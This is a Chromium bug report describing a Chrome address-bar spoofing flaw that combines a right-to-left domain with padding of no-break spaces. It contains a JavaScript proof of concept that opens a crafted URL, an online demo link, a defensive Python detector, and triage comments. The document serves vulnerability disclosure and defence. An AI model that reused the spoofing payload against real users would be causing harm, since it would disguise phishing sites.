Issue metadata
Security: Chrome RTL+ No-break space URL Spoofing
Reported by
xis...@gmail.com,
Nov 15 2016
Issue description
VULNERABILITY DETAILS
RTL URLs put the IP address on the left side of the Chrome Omnibox. Unicode U+00A0 is the no-break space, which displays as a blank in the Chrome Omnibox. A lot of no-break spaces will hide the real domain.
VERSION
Chrome Version: [54.0.2840.98] + [stable]
Operating System: [Windows 7 & 10, macOS 10.12.1, iOS 10.2, Android 7.0]
REPRODUCTION CASE
POC:
<script>
  function aa() {
    var link = document.createElement('a');
    // RTL (punycode) host, then a query made of 79 percent-encoded U+00A0 no-break
    // spaces (Array(0x50).join yields 79 separators) followed by the decoy "127.0.0.1".
    link.href = 'http://xn--ggbla1c4e.xn--ngbc5azd/?' + Array(0x50).join("%C2%A0") + '127.0.0.1';
    link.target = "aaaa"; // open in a new tab so the Omnibox shows the crafted URL
    document.body.appendChild(link);
    link.click();
  }
</script>
<a onclick="aa();" href="javascript:void(0);">CLICK ME</a>
Online Demo:http://xisigr.com/test/spoof/chrome/rtl_1.html
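As an added defensive illustration (not code from the report or from Chromium), a URL-screening heuristic that flags the two ingredients of this spoof: a host with right-to-left labels, and a long run of percent-encoded blanks followed by host-like text such as an IP address. The blank-character set beyond U+00A0 and the run threshold are assumptions of this example.

```python
import re
import unicodedata
from urllib.parse import urlsplit, unquote

# Characters an address bar renders as blank (the report uses U+00A0); the rest of
# this set is an assumption of this example, not a list from the bug report.
BLANK_CHARS = {"\u00a0", "\u2007", "\u202f", "\u200b", "\u3000", "\ufeff"}
MIN_RUN = 3  # assumed threshold: several blanks in a row is already unusual in a URL

def decode_host(host: str) -> str:
    """Decode punycode labels (xn--...) so their bidi classes can be inspected."""
    out = []
    for label in host.split("."):
        if label.lower().startswith("xn--"):
            try:
                label = label[4:].encode("ascii").decode("punycode")
            except UnicodeError:
                pass  # malformed label: keep it as-is rather than fail open
        out.append(label)
    return ".".join(out)

def analyze_url(url: str) -> dict:
    """Signals for the RTL + blank-padding spoof, plus a combined verdict."""
    parts = urlsplit(url)
    host = decode_host(parts.hostname or "")
    tail = unquote(parts.path + ("?" + parts.query if parts.query else ""))  # %C2%A0 -> U+00A0
    rtl_host = any(unicodedata.bidirectional(c) in ("R", "AL") for c in host)
    longest = run = 0
    for c in tail:
        run = run + 1 if c in BLANK_CHARS else 0
        longest = max(longest, run)
    visible = "".join(c for c in tail if c not in BLANK_CHARS)
    # Does host-like text (an IPv4 address or a dotted name) survive after the padding?
    decoy = re.search(r"(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)", visible, re.I)
    return {
        "rtl_host": rtl_host,
        "longest_blank_run": longest,
        "decoy_host": decoy.group(0) if decoy else None,
        "suspicious": longest >= MIN_RUN and decoy is not None,
    }

# Constructed sample mirroring the report: Array(0x50).join(...) yields 79 copies of %C2%A0.
POC_URL = "http://xn--ggbla1c4e.xn--ngbc5azd/?" + "%C2%A0" * 79 + "127.0.0.1"

if __name__ == "__main__":
    print(analyze_url(POC_URL))
    print(analyze_url("https://example.com/search?q=hello%20world"))
```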
Nov 15 2016
Nov 16 2016
I think this is most related to Issue 656417 . It's essentially the same exploit but using NBSPs instead of other weak-direction characters. I'll dupe this, but be sure to add this to the list of examples.
Aug 30 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by mea...@chromium.org, Nov 15 2016
Owner: mgiuca@chromium.org